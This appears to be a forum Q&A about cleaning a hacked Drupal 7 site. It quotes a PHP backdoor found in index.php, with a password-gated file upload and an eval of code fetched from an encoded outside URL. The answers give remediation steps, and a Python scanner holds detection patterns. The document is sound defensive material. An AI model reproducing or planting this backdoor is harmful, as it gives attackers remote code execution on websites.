How to catch a virus on a Drupal 7 website?
It all started very suddenly; in some miraculous way, this code is sewn into index.php:
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
eval(file_get_contents(base64_decode('aHR0cDovLzAyby5vcmcvdy8/dT0=').$sh.'&c='.$c));
}
0. Always update in a timely manner.
1. Remove all contributed modules and core, and reinstall them from drupal.org.
2. Check if there are any extra users with high rights.
3. Check whether php_filter is used; if it is used somewhere, rework that and disable it completely. Also, if users are able to publish content, check that the most restrictive input filters are used.
4. Conduct an audit of custom-written modules, if any, and of themes.
5. If possible, disable the execution of PHP scripts in the sites/*/files folder at the web server configuration level (not .htaccess).
6. If possible, make sure that the user under which the web server is running has write access only to sites/*/files and a temporary folder outside the site root, and perform all updates through drush, for example, running as the owner of the files.
Drupal is now often broken into, and it has enough vulnerabilities. It is quite possible that you are missing something, and it is through the one remaining virus file that everything reappears.
0. Make a full site backup (files + database).
1. Use the hacked module to find modified files: https://www.drupal.org/project/hacked
2. Check that there are no extraneous PHP files unrelated to Drupal (they can be loaded into any module).
3. Check all nodes, blocks, users, fields, etc. If this is not possible manually, then some kind of script is needed.
4. Check users and their roles. Both extraneous users and roles can be added in Drupal.
5. Update Drupal and all modules to the latest version: https://www.drupal.org/project/drupal/releases/7.58
6. Change admin passwords.
See details here: https://www.drupal.org/docs/develop/security/your-...
Try scanning with the ai-bolit script (or similar); it will show where the shells are. Then update completely and change passwords.
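As an added example (not code from any of the answers, and not a substitute for the hacked module or ai-bolit), here is a small Python scanner for two of the checks raised above: PHP source sitting under sites/*/files, and code shaped like the snippet in the question. The pattern names, `scan()`, `demo()` and the sample docroot are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics modelled on the snippet in the question; not a complete signature set.
PATTERNS = {
    "eval-of-fetched-or-decoded-code": re.compile(
        rb"eval\s*\(\s*(file_get_contents|base64_decode|gzinflate)\s*\(", re.I),
    "upload-to-request-controlled-path": re.compile(
        rb"move_uploaded_file\s*\([^;]*\$_(POST|GET|REQUEST)", re.I),
    "hardcoded-md5-gate": re.compile(
        rb"md5\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)[^)]*\)\s*===?\s*['\"][0-9a-f]{32}['\"]",
        re.I),
}
# File extensions that hold PHP source in a Drupal 7 tree.
PHP_NAME = re.compile(r"\.(php\d?|phtml|inc|module|install)$", re.I)


def scan(root):
    """Return sorted (relative_path, reason) findings for a Drupal 7 docroot."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or not PHP_NAME.search(path.name):
            continue
        rel = path.relative_to(root)
        # Uploads live in sites/<site>/files; PHP source normally has no place there.
        if len(rel.parts) > 3 and rel.parts[0] == "sites" and rel.parts[2] == "files":
            findings.append((rel.as_posix(), "php-in-upload-dir"))
        data = path.read_bytes()
        findings += [(rel.as_posix(), why) for why, rx in PATTERNS.items() if rx.search(data)]
    return sorted(findings)


def demo():
    """Scan a constructed docroot: one clean file, one tampered index.php, one stray upload."""
    gate = b"<?php if(md5($_POST['hash'])=='" + b"0" * 32 + b"'){"
    tampered = gate + b"move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);}"
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "sites/default/files/styles").mkdir(parents=True)
        (root / "includes").mkdir()
        (root / "includes/bootstrap.inc").write_bytes(b"<?php\nfunction drupal_bootstrap() {}\n")
        (root / "index.php").write_bytes(tampered)
        (root / "sites/default/files/styles/x.php").write_bytes(b"<?php echo 1;")
        return scan(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{reason:36} {path}")
```

A hit is a lead for manual review, and a clean result does not prove the tree is clean; comparing core and contributed files against their drupal.org originals remains the stronger check.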